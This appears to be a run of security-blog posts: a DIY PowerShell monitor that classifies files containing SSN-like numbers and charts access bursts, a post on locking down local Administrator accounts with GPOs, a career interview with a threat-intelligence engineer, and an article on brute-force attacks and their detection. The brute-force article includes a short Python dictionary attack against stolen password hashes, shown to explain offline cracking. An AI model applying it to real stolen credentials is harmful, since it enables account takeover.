Register-WmiEvent -Query "SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA 'CIM_DataFile' and TargetInstance.Path = '\\Users\\Administrator\\' and targetInstance.Drive = 'C:' and (targetInstance.Extension = 'txt' or targetInstance.Extension = 'doc' or targetInstance.Extension = 'rtf') and targetInstance.LastAccessed > '$($cur)' " -sourceIdentifier "Accessor" -Action $action   
Write-Host "starting engine ..."

while ($true) {

   Wait-Event -SourceIdentifier Access # nothing ever raises "Access", so this blocks forever and keeps the script alive
  
}

 

Then I took on the main piece of code, where I classify files based on whether they have social security numbers and other sensitive keywords. As events come in from the handler, the file reclassification is triggered. This code then periodically displays some of the results of the classification.

In this latest version, I removed the “real-time” classification and focused on cleaning up the PowerShell code and improving the graphics — more on that below.

I took a wrong turn in the original version by relying on a PowerShell data locking module to synchronize data access from concurrent tasks, which I used for some of the grunt work. On further testing, the freebie module that implements the Lock-Object cmdlet didn’t seem to work.

As every junior system programmer knows, it’s easier to synchronize with messages than with low-level locks. I reworked the code to take the messages from the event handler above, and send them directly to a main message processing loop. In short: I was able to deal with asynchronous events in a synchronous manner.

.Net Framework Charts and PowerShell

My great discovery in the last month was that I could embed Microsoft-style charts inside PowerShell. In other words, the bar, line, scatter and other charts that are available in Excel and Word can be controlled programmatically in PowerShell. As a newbie PowerShell programmer, this was exciting to me. You can read more about .Net Framework Controls in this post.

It’s a great idea, and it meant I could also replace the messy Out-GridView code.

But the problem, I quickly learned, is that you also have to deal with some of the interactive programming involved with Microsoft forms. I just wanted to display my .Net charts while not having to code the low-level details. Is there a lazy way out?

After much struggle, I came to see that the easiest way to do this is to launch each chart in its own runspace as a separate task. (Nerd Note: this is how I avoided coding message handling for all the charts since each runs separately as modal dialogs.)

I also benefited from this freebie PowerShell module that wraps the messy .Net chart controls. Thanks Marius!

I already had set up a tasking system earlier to scan and classify each file in the directory I was monitoring, so it was just a matter of reusing this tasking code to launch graphs.

I created a pie chart showing the relative concentration of sensitive data, a bar chart breaking down files by sensitive data type, and, the one I’m most proud of, a classic event stair-step chart for file access burst conditions — a possible sign of an attack.

My amazing dashboard. Not bad for PowerShell with .Net charts.

For those who are curious about the main chunk of code doing all the work of my SSP, here it is for your entertainment:

 
$scan = {  #file content scanner
$name=$args[0]
function scan {
   Param (
      [parameter(position=1)]
      [string] $Name
   )
      $classify =@{"Top Secret"=[regex]'[tT]op [sS]ecret'; "Sensitive"=[regex]'([Cc]onfidential)|([sS]nowflake)'; "Numbers"=[regex]'[0-9]{3}-[0-9]{2}-[0-9]{4}' }  # SSN-style pattern: 3-2-4 digits
     
      $data = Get-Content $Name
      
      $cnts= @()
      
      if($data.Length -eq 0) { return $cnts} 
      
      foreach ($key in $classify.Keys) {
       
        $m=$classify[$key].matches($data)           
           
        if($m.Count -gt 0) {
           $cnts+= @($key,$m.Count)  
        }
      }   
 $cnts   
}
scan $name
}




#launch a .net chart 
function nchart ($r, $d, $t,$g,$a) {

$task= {
Param($d,$t,$g,$a)

Import-Module C:\Users\Administrator\Documents\charts.psm1
$chart = New-Chart -Dataset $d -Title $t -Type $g -Axis $a
Show-Chart $chart

}
$Task = [powershell]::Create().AddScript($task).AddArgument($d).AddArgument($t).AddArgument($g).AddArgument($a)
$Task.RunspacePool = $r
$Task.BeginInvoke()

}

Register-EngineEvent -SourceIdentifier Delta -Action {
      
      if($event.MessageData -eq "Burst") { #just look at bursts
        New-Event -SourceIdentifier File -MessageData $event.MessageData -EventArguments $event.SourceArgs 
      }
      
      
      Remove-Event -SourceIdentifier Delta
}




$list=Get-WmiObject -Query "SELECT * From CIM_DataFile where Path = '\\Users\\Administrator\\' and Drive = 'C:' and (Extension = 'txt' or Extension = 'doc' or Extension = 'rtf')"  


#long list --let's multithread

#runspace
$RunspacePool = [RunspaceFactory]::CreateRunspacePool(1,5)
$RunspacePool.Open()
$Tasks = @()




foreach ($item in $list) {
  
  $Task = [powershell]::Create().AddScript($scan).AddArgument($item.Name)
  $Task.RunspacePool = $RunspacePool
  
  $status= $Task.BeginInvoke()
  $Tasks += @($status,$Task,$item.Name)
}




#wait for scan tasks to finish, sleeping briefly so the loop doesn't spin the CPU
while ($Tasks.isCompleted -contains $false){
  Start-Sleep -Milliseconds 100
}


#Analytics, count number of sensitive content for each file
$obj = @{}
$tdcnt=0
$sfcnt=0
$nfcnt=0


for ($i=0; $i -lt $Tasks.Count; $i=$i+3) {
   $match=$Tasks[$i+1].EndInvoke($Tasks[$i]) 
  
   if ($match.Count -gt 0) {   
      $s = ([string]$Tasks[$i+2]).LastIndexOf("\")+1
      
      $obj.Add($Tasks[$i+2].Substring($s),$match)
       for( $j=0; $j -lt $match.Count; $j=$j+2) {      
         switch -wildcard ($match[$j]) {
             'Top*'  { $tdcnt+= 1 }
                      
             'Sens*' { $sfcnt+= 1}                      
                      
             'Numb*' { $nfcnt+=1} 
                                              
      }         
            
       }
   }    
   $Tasks[$i+1].Dispose()
   
}


#Display Initial Dashboard
#Pie chart of sensitive files based on total counts of sensitive data
$piedata= @{}
foreach ( $key in $obj.Keys) {
   $senscnt =0
   for($k=1; $k -lt $obj[$key].Count;$k=$k+2) {
     $senscnt+= $obj[$key][$k]

   }
   $piedata.Add($key, $senscnt) 

}


nchart $RunspacePool $piedata "Files with Sensitive Content" "Pie" $false

#Bar Chart of Total Files, Sensitive  vs Total
$bardata = @{"Total Files" = $Tasks.Count}
$bardata.Add("Files w. Top Secret",$tdcnt)
$bardata.Add("Files w. Sensitive", $sfcnt)
$bardata.Add("Files w. SS Numbers",$nfcnt)


nchart $RunspacePool $bardata "Sensitive Files" "Bar" $false


#run event handler as a separate job
Start-Job -Name EventHandler -ScriptBlock({C:\Users\Administrator\Documents\evhandler.ps1})


while ($true) { #main message handling loop
   
       [System.Management.Automation.PSEventArgs] $fileEvent = Wait-Event -SourceIdentifier File  # wait on event (renamed from $args to avoid clobbering the automatic variable)
        Remove-Event -SourceIdentifier File
        #Write-Host $fileEvent.SourceArgs
        if ($fileEvent.MessageData -eq "Burst") {
        #Display Bursty event
         $dt=$fileEvent.SourceArgs
         #time in seconds
         [datetime]$sevent =$dt[0][1]
         
         $xyarray = [ordered]@{}
         $xyarray.Add(0,1)
         for($j=1;$j -lt $dt.Count;$j=$j+1) {
               [timespan]$diff = $dt[$j][1] - $sevent
               $xyarray.Add($diff.Seconds,$j+1) 
          }
          nchart $RunspacePool $xyarray "Burst Event" "StepLine" $true 
        }        
        
   
}#while

Write-Host "Done!"

 

Lessons Learned

Of course, with any mission the point is the journey not the actual goal, right? The key thing I learned is that you can use PowerShell to do security monitoring. For a single directory, on a small system. And only using it sparingly.

While I plan on improving what I just presented by adding real-time graphics, I’m under no illusion that my final software would be anything more than a toy project.

File event monitoring, analysis, and graphical display of information for an entire system is very, very hard to do on your own. You can, perhaps, recode my solution using C++, but you’ll still have to deal with the lags and hiccups of processing low-level events in the application space. To do this right, you need to have hooks deep in the OS — for starters — and then do far more serious analysis of file events than is performed in my primitive analytics code. That ain’t easy!

I usually end these DIY posts by saying “you know where this is going.” I won’t disappoint you.

You know where this is going. Our own enterprise-class solution is a true data security platform or DSP – it handles classification, analytics, threat detection, and more for entire IT systems.

By all means, try to roll your own, perhaps based on this project, to learn the difficulties and appreciate what a DSP is actually doing.

Have questions? Feel free to contact us!

Next Steps

If you’re interested in learning more practical, security focused PowerShell, you can unlock the full 3 hour video course on PowerShell and Active Directory Essentials with the code cmdlet.

Working With Windows Local Administrator Accounts, Part III

This article is part of the series "Working With Windows Local Administrator Accounts". Check out the rest:

One point to keep in mind in this series is that we’re trying to limit the powers that are inherent in Administrator accounts. In short: use the Force sparingly. In the last post, we showed it’s possible to remove the local Administrator account and manage it centrally with GPOs. Let’s go over a few things I glossed over last time, and discuss additional ways to secure these accounts.

Restricted Groups: Handle with Care

In my Acme environment, the Restricted Groups GPO is used to push out a domain-level group to the local Administrators group in each of the OUs: one policy for Masa and Pimiento, another for Taco. It’s a neat trick, and for larger domains, it saves IT from having to do this through scripts or spending time performing this manually.

To refresh memories, here’s how my GPO for Restricted Groups looked:

Replaces local Administrators groups with Acme-IT-1.

By using the “Member of this group” section, I’m forcing the Group Policy Manager to replace, not add, Acme-IT-1 to each local Administrators group in my OU. The problem is you may overwrite existing group members, and you don’t know what services or apps depend on certain local accounts being there.

You’ll likely want to evaluate this idea on a small sample first. This may involve more work — local scripts to re-add those accounts, or possibly creating new domain-level accounts that can be added into the above.
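Before flipping the switch, it’s worth inventorying what’s in each local Administrators group today. A minimal sketch (assumes PowerShell 5.1 on the targets, PowerShell remoting enabled, and a hypothetical machines.txt host list):

# Who is in the local Administrators group right now, on every machine in the sample?
Invoke-Command -ComputerName (Get-Content .\machines.txt) -ScriptBlock {
    Get-LocalGroupMember -Group 'Administrators' |
        Select-Object @{ n='Computer'; e={ $env:COMPUTERNAME } }, Name, ObjectClass
}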

Or if you prefer, you can use Group Policy Preferences (GPP). It has an update option for adding a new group (or user) to a local Administrators group (below). We know not to use GPP to reset local Administrator account passwords, right?

With GPP, you can add Acme-IT-2 to the local Administrators groups.

Even More Secure

There is, sigh, a problem in using Restricted Groups and centrally managed domain-level Administrator accounts. Since all users, by default, are under Domain Users, these local Administrators can be exploited through Pass-the-Hash (PtH) techniques — get the NTLM hash, and pass it to psexec — to log on to any other machine in the network.

This was the conundrum we were trying to grapple with in the first place! Recall: local Administrators are usually given simple — easily guessable or hackable — passwords which can then be leveraged to log on to other machines. We wanted to avoid having an Administrator-level local account that can be potentially used globally.

As I mentioned in the second post, this security hole can be addressed by creating a GPO – under User Rights Assignment – to restrict network access altogether. This may not be practical in all cases for Administrator accounts.

Another possibility is to limit the machines that these domain-level Administrator accounts can log into. And again we make a lifeline call to User Rights Assignment, but this time enlisting the “Allow log on locally” property, adding the Acme-IT-1 Administrators group (below). We would do the same for the other OU in the Acme domain, but adding the Acme-IT-2 group.

This GPO prevents accounts from logging on to machines outside the specified OU. So even if a clever hacker gets into the Acme company, he could PtH with an Administrator account, but only within the OU.

It’s a reasonable solution. And I do realize that many companies likely already use this GPO property for ordinary user accounts, just for reasons I noted above.

Additional Thoughts

In writing this brief series, you quickly come to the conclusion that zillions of IT folks already know in their bones: you’re always trying to balance security against convenience. You won’t have a perfect solution, and you’ve probably erred on the side of convenience (to avoid getting shouted at by the user community).

Of course, you live with what you have. But then you should compensate for potential security holes by stepping up your monitoring game! You know where this is going.

One final caveat goes back to my amazing pen testing series, where I showed how delegated Administrator groups can be leveraged to allow hackers to hop more freely around a domain — this has to do with accounts being in more than one Active Directory group. Take another look at it!

[Podcast] Roxy Dee, Threat Intelligence Engineer

Leave a review for our podcast & we'll send you a pack of infosec cards.


Some of you might be familiar with Roxy Dee’s infosec book giveaways. Others might have met her recently at Defcon as she shared with infosec n00bs practical career advice. But aside from all the free books and advice, she also has an inspiring personal and professional story to share.

In our interview, I learned about her budding interest in security at a time when she lacked the funds to pursue her passion. How did she work around her financial constraints? Free videos and notes from Professor Messer! What’s more, she thrived in her first post providing tech support for Verizon Fios. With grit, discipline and volunteering at BSides, she eventually landed an entry-level position as a network security analyst.

Now she works as a threat intelligence engineer and, in her spare time, writes how-tos and shares sage advice on her Medium account, @theroxyd.

Transcript

Cindy Ng: For individuals who have had a nonlinear career path in security, Threat Intelligence Engineer Roxy Dee knows exactly what that entails. She begins by describing what it was like to learn about a new industry with limited funding, and how she studied security fundamentals in order to get her foot in the door. In our interview, she reveals three things you need to know about vulnerability management, why fraud detection is a lot like network traffic detection, and how to navigate your career with limited resources.

We currently have a huge security shortage, and people are making analogies as to the kind of people we should hire. For instance, if you’re able to pick up music, you might be able to pick up technology. And I’ve found that in security it’s extremely important to be detail oriented, because the adage is that the bad guys only need to be right once, while security people need to be right all the time. And I read on your Medium account about the way you got into security, for practical reasons. So let’s start there, because it might help encourage others to start learning about security on their own. Tell us what aspect of security you found interesting and the circumstances that led you in this direction.

Roxy Dee: Just to comment on what you’ve said: that’s actually a really good reason to make sure you have a diverse team, because everybody has their own special strengths, and having a diverse team means that you’ll be able to fight the bad guys a lot better, because there will always be someone that has that strength where it’s needed. The bad guys can develop their own team the way they want, so it’s important to have a diverse team, because every bad guy you meet is going to be different. That’s a very good point in itself.

Cindy Ng: Can you clarify “diverse?” You mean everybody on your team is going to have their own specialty that they’re really passionate about? By knowing what they’re passionate about, you know how to leverage their skill set? Is that what you mean by diversity?

Roxy Dee: Yeah. That’s part of it. I mean, just making sure that you don’t have the same kind of person everywhere. For example, I’ll tell my story like you asked in the original question. As a single mom, I have a different experience than someone that has had fewer difficulties in that area, so I might think of things differently, or be resourceful in different ways. Or, I’m not really that great at writing reports. I can write well, but I haven’t had the practice of writing reports. Somebody that went to college might have that, because they were kind of forced to do it. You get that coverage by having people from different backgrounds who have had different struggles.

And I got into security because I was already into phone phreaking, which is a way of hacking the phone system. And so for me, when I went to my first 2600 Meeting and they were talking about computer security and information security, it was a new topic and I was kind of surprised. I was like, “I thought 2600 was just about phone hacking.” But I realized that at the time…It was 2011, and phone hacking had become less of a thing and computer security became more of something. I got the inspiration to go that route, because I realized that it’s very similar. But as a single mom, I didn’t have the time or the money to go to college and study for it. So I used a lot of self-learning techniques, I went to a lot of conferences, I surrounded myself with people that were interested in the topic, and through that I was able to learn what I needed to do to start my career.

Cindy Ng: People have trouble learning the vocabulary because it’s like learning a new language. Even though you were into phone hacking, computer security has its own distinct language. How did you make the connections, and how long did it take you? What experiences did you surround yourself with to cultivate a security mindset?

Roxy Dee: I’ve been on computers since I was a little kid, like four or five years old. So it may not have been as difficult for me as for other people, because I kind of grew up on computers. Having that background helped. But when it came to information security, there were a lot of times where I had no idea what people were saying. Like I did not know what “reverse engineering” meant, or I didn’t know what “Trojan” meant. And now, it’s like, “Oh, I obviously know what those things are.” But I had no idea what people were talking about. So I went to conferences, watched DEF CON talks, and listened to people. By the time I had gone to DEF CON about three times, I think it was my third time, I thought, “Wow. I actually know what people are saying now.” It’s just a gradual process, because I didn’t have that formal education.

There were a few conferences that I volunteered at. Mostly at BSides. And BSides are usually free anyway. When you volunteer, you become more visible in the community, and so people will come to you or people will trust you with things. And that was a big part of my career, was networking with people and becoming visible in the community. That way, if I wanted to apply for a job, if I already knew someone there or if I knew someone that knew someone, it was a lot easier to get my resume pushed to the hiring manager than if I just apply.

Cindy Ng: How were you able to land your first security job?

Roxy Dee: As far as my first infosec job, I was working in tech support and I was doing very well at it. I was at the top of the metrics; I was always among the top 10 agents.

Cindy Ng: What were some of the things that you were doing?

Roxy Dee: It was tech support for Verizon Fios. There was a lot of, “Restart your router,” “Restart your set-top box,” things like that. But I was able to learn how to explain things to people in ways that they could understand. So it really helped me understand tech speak, I guess, understand how to speak technically without losing the person, like a non-technical person.

Cindy Ng: And then how did you transition into your next role?

Roxy Dee: It all had to do with networking, and at this point, I had volunteered for a few BSides. So actually, someone that I knew at the time told me about a position that was an entry-level network security analyst, and all I needed to do was get my Security+ certification within the first six months of working there. It was an opportunity for me because they accepted entry-level. And when they gave me the assessment that they give people they interview, I aced it, because I had already studied networking through a website called Professor Messer. That website actually helped me with Security+ as well, and I was able to do that entirely through YouTube videos; his whole site is just YouTube videos. Once I got there, I took my Security+, and I ended up, actually, on the night shift. So I was able to study in quiet during my shift every day at work. I just made it a routine: “I have to spend this amount of time studying on” whatever topic I wanted to move forward with. I knew what to study because I was going to conferences and taking notes from the talks, writing down things I didn’t understand or words I didn’t know, and then later researching those topics so I could understand more. Then I would watch the talk again with that understanding if it was recorded, or I would go back to my notes with that understanding. The fact that I was working overnight and was not interrupted really helped. And that was a very entry-level position. From there, I went to a secure cloud hosting company with a focus on security, and the great thing about that was that it was a startup. They didn’t have a huge staff, and they had a ton of things to do and a bunch of unrealistic deadlines. So they would constantly be throwing me into situations I was not prepared for.

Cindy Ng: Can you give us an example?

Roxy Dee: Yeah. That was really the best training for me: just being able to do it. So when they started a Vulnerability Management Program, I had no experience in vulnerability management before that, and they wanted me to be one of the two people on the team. So I had a manager, and then I was the only other person. Through this position, I learned what good techniques are, and I was also inspired to do more research on it. If I hadn’t been given that position, I wouldn’t have been inspired to look it up.

Cindy Ng: What does vulnerability management entail? What are three things that we should know?

Roxy Dee: Yeah. So vulnerability management has a lot to do with making sure that all the systems are up to date on patching. That’s one of them. The second thing, which I would say is very important, is inventory management, because there were some systems that nobody was using, and vulnerabilities existed there, but there was actually no one to fix them. So if you don’t take proper inventory of your systems, and you don’t do discovery scans to discover what’s out there, you could have something sitting there that an attacker, once they get in, could use or might have access to. And then another thing that’s really important in vulnerability management is actually managing the data, because you’ll get a lot of data, but if you don’t use it properly it’s pretty much useless, if you don’t have a system to track when things need to be remediated by and what your compliance requirements are. So you have to track, “When did I discover this, and when is it due? What are the vulnerabilities, and what are the systems? What do the systems look like?” There’s a lot of data you’re going to get, and you have to manage it, or you will be completely unable to use it.

Cindy Ng: And then you moved on into something else?

Roxy Dee: Oh, yes. Actually, it being a startup kind of wore on me, to be honest. So I got a phone call from a recruiter, actually, while I was at work.

This was another situation where I had no idea how to do what I was tasked with, and the task was…So from my previous positions, I had learned how to monitor and detect, and how to set up alerts, useful alerts that can serve, you know, whatever purpose was needed. So I already had this background. So they said, “We have this application. We want you to log into it, and do whatever you need to do to detect fraud.” Like it was very loosely defined what my role was, “Detect bad things happening on the website.” So I find out that this application actually had been stood up four years prior and they kind of used it for a little while, but then they abandoned it.

And so my job was to bring it back to life and fix some of the issues that they didn’t have time for, or they didn’t actually know how to fix or didn’t want to spend time fixing them. That was extremely beneficial. I had been given a task, so I was motivated to learn this application and how to use it, and I didn’t know anything about fraud. So I spent a lot of time with the Fraud Operations team, and through that, through that experience of being given a task and having to do it, and not knowing anything about it, I learned a lot about fraud.

Cindy Ng: I’d love to hear from your experience what you’ve learned about fraud that most people might not know.

Roxy Dee: What I didn’t consider was that, actually, fraud detection is very much like network traffic detection. You look for a type of activity or a type of behavior and you set up detection for it, and then you make sure that you don’t have too many false positives. And it’s very similar to what network security analysts do. And when I hear security people say, “Oh, I don’t even know where to start with fraud,” well, just think about from a network security perspective if you’re a network security analyst, how you would go about detecting and alerting. And the other aspect of it is the fraudulent activity is almost always an anomaly. It’s almost always something that is not normal. If you’re just looking around for things that are off or not normal, you’re going to find the fraud.

Cindy Ng: But how can you tell what’s normal and what’s not normal?

Roxy Dee: Well, first, it’s good to look at all sorts of sessions and all sorts of activity and get a baseline of, you know, “This is normal activity.” But you can also talk to the Fraud team, or whatever team handles the issue; it’s not specific to fraud. If you’re detecting something else, talk to the people that handle it. And ask them, “What would make your alerts better? What is something that has not been found before, or something that you were alerted to, but too late?” Just ask a bunch of questions, and through asking you’ll find what you need to detect.

Like for example, there was one situation where we had a rule that if a certain amount was sent in a certain way, like a wire, that it would alert. But what we didn’t consider was, “What if there’s smaller amounts that add up to a large amount?” And understanding…So we found out that, “Oh, this amount was sent out, but it was sent out in small pieces over a certain amount of time.” So through talking to the Fraud Operations team, if we didn’t discuss it with them, we never would have known that that was something that was an issue. So then we came up with a way to detect those types of fraudulent wire transfers as well.

Cindy Ng: How interesting. Okay. You were talking about your latest role at another bank.

Roxy Dee: I finished my contract and then I went to my current role, which focuses on a lot more than just online activity. I have more to work with now. With each new position, I just kind of layered more experience on top of what I already knew. And I know it’s better to work for a company for a long time and I kind of wish these past six years, I had been with just one company.

Each time that I changed positions, I got more responsibility, pay increase, and I’m hoping I don’t have to change positions as much. But it kind of gave me like a new environment to work with and kind of forced me to learn new things. So I would say, in the beginning of your career, don’t settle. If you get somewhere and you don’t like what you’re being paid, and you don’t think your career is advancing, don’t be afraid to move to a different position, because it’s a lot harder to ask for a raise than to just go somewhere else that’s going to pay you more.

So I’m noticing that a lot of the companies I’ve worked for will expect the employees to stay without giving them any sort of incentive to stay. And so when a new company comes along, they say, you know, “Wow. She’s working on this and that, and she’s making x amount. We can take all that knowledge she learned over there, and we can basically buy it for $10,000 more than what she’s making currently.” So companies are interested in grabbing people from other companies that have already had the experience, because it’s kind of a savings in training costs. So, you know, I try to look every six months or so, just to make sure there’s not a better deal out there, because they do exist. I don’t know how that is in other fields, though. I know in information security, we have that. That’s just the nature of the field right now.

Cindy Ng: I think I got a good overview of your career trajectory. I’m wondering if there’s anything else that you’d want to share with our listeners?

Roxy Dee: Yeah. I guess, I pretty much have spent…So the first two or three years, I spent really working on myself, and making sure that I had all the knowledge and resources I needed to get that first job. The person that I was five or six years ago is different than who I am now. And what I mean is, my situation has changed a bit, to where I have more income and I have more capabilities than I did five years ago. One of the things that’s been important to me is giving back and making sure that, you know, just because I went through struggles five years ago…You know, I understand we all have to go through our struggles. But if I can make something a little bit easier for someone that was in my situation or maybe in a different situation but still needs help, that’s my way of giving back.

And spending $20 to buy someone a book is a lot less of a hit on me financially than it would have been five years ago. Five years ago, I couldn’t afford to drop even $20 on a book to learn. I had to do everything online, and everything had to be free. I just want to encourage people: seek out ways to help someone. For example, if you see someone that wants to speak at a conference and they just don’t have the resources to do so, you might think, “Well, a $100-a-night hotel room is less of a financial hit to me than it is to that person, and it could mean the difference between them having a career-building opportunity or not having it.” One of the things I’ve been doing is the free book giveaway, where I actually have people sending me Amazon gift cards, and there’s actually one person that’s done it consistently in large amounts. What I do with that is, every two weeks, I send out a tweet: if you reply to it with the book that you want, you can win that book, up until I run out of Amazon dollars.

Cindy Ng: Is this person an anonymous patron or benefactor? This person just sends you an Amazon gift card…with a few bucks and you share it with everyone? That’s so great.

Roxy Dee: And other people have sent me, you know, $20 to $50 in Amazon credits, and it’s just a really good thing. It kind of happened accidentally, and the story of it is on my Medium account.

Cindy Ng: What were the last three books that you gave away?

Roxy Dee: Oh, the last three? Well…

Cindy Ng: Or the last one, if you…

Roxy Dee: …the most popular one right now, based on the last giveaway I did, is the Defensive Security Handbook. That was the most popular one. But I also get a lot of requests for Practical Packet Analysis by Chris Sanders and for Practical Malware Analysis. The Defensive Security Handbook is a very recent book, by Amanda Berlin and Lee Brotherston. It says, “Best practices for securing infrastructure,” so it’s a blue-team-themed book. It’s actually sold over 1,000 copies already, and it only came out about a month ago. So I think that’s going to be a very popular book for my giveaways.

Cindy Ng: How are you growing yourself these days?

Roxy Dee: Well, I want to spend more time writing guides. I just want to write things that can help beginners. I have set up my Medium account, and I posted something on setting up a honeypot network, which sounds very complicated, but I broke it down step by step. My goal was to make one article you could use to set it up, because a lot of the issues I was having were that I might find a guide on how to do something, but it didn’t include every single step. They assumed that you knew certain things before you started on that guide. So I want to write things that are easy for people to follow without having to go look up other sources, or if they do have to look up another source, I have it listed right there. I want to make things that don’t assume prior knowledge.

Cindy Ng: Thank you so much for sharing with me, with our listeners.

Roxy Dee: Thank you for letting me tell my story, and I hope that it’s helpful to people. I hope that people get some sort of inspiration, because I had a lot of struggles and, you know, there’s plenty of times I could have quit. And I just want to let people know that there are other ways of doing things and you don’t have to do something a certain way. You can do it the way that works for you.

 

Brute Force: Anatomy of an Attack


The media coverage of NotPetya overshadowed what might have been a more significant attack: a brute force attack on the UK Parliament. While for many it was simply fertile ground for Brexit jokes on Twitter, an attack that targets a major government body is a reminder that brute force remains a common threat to be addressed.

It also raises important questions as to how such an attack could have happened in the first place. These questions suggest that we need to look deeper into this important, but often misunderstood, type of attack.

Brute force defined

At the end of the day, there are two methods used to infiltrate an organization: exploiting human error or guesswork. Exploiting human error has many attack variants: phishing (a user mistake), taking advantage of a flawed configuration (an administrator mistake), or abusing a zero-day vulnerability (a developer mistake). Guesswork, on the other hand, is encompassed in one type of attack: brute force.

Most commonly, a brute force attack is used to guess credentials, though it may be used to guess other things such as URLs.

A classic brute force attack is an attempt to guess passwords at the attacker’s home base, once the attacker has gotten hold of the encrypted passwords. This enables the attacker to use powerful computers to test a large number of passwords without risking detection. On the other hand, such a brute force attack can’t be the first step of an attack, since the attacker needs a copy of the victim’s encrypted passwords to begin with.
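To make the offline variant concrete, here is a minimal Python sketch. It assumes, purely for illustration, a stolen table of unsalted SHA-256 password hashes; the stolen_hashes and wordlist names are hypothetical.

import hashlib

# Hypothetical stolen table: username -> unsalted SHA-256 password hash.
# (The hash below is sha256("password"), for illustration.)
stolen_hashes = {
    "alice": "5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8",
}

# Hypothetical wordlist; real attackers use lists with millions of entries.
wordlist = ["123456", "qwerty", "password", "letmein"]

for word in wordlist:
    digest = hashlib.sha256(word.encode()).hexdigest()
    for user, stolen in stolen_hashes.items():
        if digest == stolen:
            print(f"Guessed {user}'s password: {word}")

Because all the guessing happens on hardware the attacker controls, no failed-login events are ever generated on the victim’s systems, which is exactly why this variant evades detection. Salting and slow hash functions make the guessing far more expensive, but the principle stands.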

The online, real-time variant of the attack tries to pound a login function of a system or an application to guess credentials. Since it avoids the need to get encrypted passwords in the first place, attackers can use this technique when attempting to penetrate a system on which they have no prior foothold.

Do online brute force attacks happen?

Trying to guess both a user name and a password is ultimately very hard. Since most systems don’t report whether the username or the password was wrong on failed login, the first shortcut that an attacker takes is to try to attack known users. The attacker can find usernames using open source intelligence: in many organizations, for instance, user names have a predictable structure based on the employee name – and a simple LinkedIn search will reveal a large number of usernames.

That said, this type of classic online brute force attack (at least against well-established systems) is more myth than reality. The reason is simple: most modern systems and applications have a built-in countermeasure, lockout. If a user fails to log in more than a few times, the account is locked and requires administrator intervention to unlock. Today, it’s the lockouts that create headaches for IT departments rather than brute force, making lockout monitoring more essential than brute force detection.

The exception to this is custom-built applications. While the traditional Windows login may not be exploitable, a new web application developed specifically for an upcoming holiday marketing campaign may very well be.

In comes credential stuffing

While classic online brute force attacks seem to be diminishing, credential stuffing is making its way to center stage. Credential stuffing is an attack in which attackers use credentials (username/password pairs) stolen from public internet sites to break into a target system. The number of successful attacks against public websites keeps increasing, and attackers publish the stolen credential databases or sell them on underground exchanges. The assumption, which too often holds true, is that people reuse the same username and password across sites.

Credential stuffing bypasses lockout protections since each username is used only once.  By using known username/password pairs, credential stuffing also increases the likelihood of success with a lower number of tries.

Since lockout is not effective as a countermeasure, organizations incorporate two-factor authentication mechanisms to try to avoid credential stuffing – and the use of stolen credentials in general. Two-factor authentication requires a user to have something else besides a password to authenticate: for example, a particular cell phone on which the user can receive a text message. Since two-factor authentication is cumbersome, a successful authentication usually approves any “similar” access. “Similar” may imply the use of the same device or the same geographical location. Most of us have experienced public websites requiring two-factor authentication when we accessed them from a new device, a public computer, or when traveling.

While two-factor authentication is a robust solution, it has significant downsides: it alters the user experience and requires an interactive login. Nothing is more frustrating than being asked for two-factor authentication on your phone just when landing in a foreign airport after a long flight. As a result, it is often left as an option for the user. And so, this calls for a detection system, often utilizing analytics, to recognize brute force attacks in action.

Detecting brute force attacks

The most commonly prescribed detection method for brute force seems to address the classic but impractical variant of the attack: detecting multiple failed login attempts for a single user over a short span of time. Many beginner exercises in creating SIEM (Security Information and Event Management) correlation rules focus on detecting brute force attacks by identifying exactly such a scenario. While elegant and straightforward as an exercise, it addresses a practically non-existent attack vector, and we need much more to detect real-world brute force attacks.
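For illustration only, that textbook rule amounts to a per-user threshold within a sliding time window. Here is a minimal Python sketch; on_failed_login and its user/ts inputs are hypothetical names, assuming the events have already been parsed.

from collections import defaultdict, deque

THRESHOLD = 5   # failed attempts that trigger an alert
WINDOW = 60     # seconds

failures = defaultdict(deque)   # username -> timestamps of recent failures

def on_failed_login(user, ts):
    q = failures[user]
    q.append(ts)
    # Drop attempts that fell out of the time window.
    while q and q[0] < ts - WINDOW:
        q.popleft()
    if len(q) >= THRESHOLD:
        print(f"ALERT: {len(q)} failed logins for {user} within {WINDOW}s")

# Feeding it five rapid failures for the same account trips the alert.
for t in range(5):
    on_failed_login("alice", 1000 + t)

As noted above, account lockout fires long before such a rule becomes useful against well-established systems, so treat this as the exercise version rather than real-world detection logic.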

The factor that will hold true for any authentication brute force attack is a large number of failed authentication attempts. However, since the username cannot serve as the key for detection, a detection system has to focus on another key to connect the thread of events making up the attack.

One method is to track failed authentications from a single source, most often the source IP address. However, with public IP addresses becoming scarcer and more expensive, more and more users end up sharing the same source IP.

To overcome this, a detection mechanism can learn the normal rate of connections, or of failures, from a source IP to determine what would be an abnormal rate, thus taking into account the fact that multiple users might be connecting from the same source IP. The detector might also use a device fingerprint (a combination of properties in the authentication event that are typical of a device) to identify a particular source among those using the same IP address. This cannot be a primary factor, however, and can only help verify detection, as most of the fingerprinting properties are under the control of the attacker and can be forged.
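To sketch the rate-based idea in Python (all names here are hypothetical, and it is assumed a per-IP baseline has already been learned from historical data):

from collections import defaultdict, deque

WINDOW = 300        # seconds
MIN_EVENTS = 20     # ignore low counts: shared IPs produce benign failures
FACTOR = 5.0        # how far above the learned baseline counts as abnormal

recent = defaultdict(deque)            # source ip -> failure timestamps
baseline = defaultdict(lambda: 2.0)    # learned failures per window, per ip

def on_failed_login(ip, ts):
    q = recent[ip]
    q.append(ts)
    while q and q[0] < ts - WINDOW:
        q.popleft()
    # Alert only when the count is high both absolutely and relative to the
    # baseline, so a busy NAT gateway with a high baseline isn't flagged.
    if len(q) >= MIN_EVENTS and len(q) > FACTOR * baseline[ip]:
        print(f"ALERT: {len(q)} failed logins from {ip} in the last {WINDOW}s")

A real implementation would update the baseline continuously and would treat a device fingerprint only as corroborating evidence, for the forgery reasons noted above.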

Distributed attacks – for example by utilizing a botnet or by rerouting attempts through a network of privacy proxies such as TOR – further complicate the challenge since source monitoring becomes irrelevant. Device fingerprinting may work to an extent, especially if the attack is still carried out by a single source but through multiple routes. An additional approach is to use threat intelligence, which would help to identify access from known botnet nodes or privacy proxies.

The Practicalities of Detection

So far, we’ve assumed that the events used for analysis are neat and tidy: any failed login event is clearly labeled as a “login,” the result is clearly identified as success or failure, and the username is always in the same field and format.

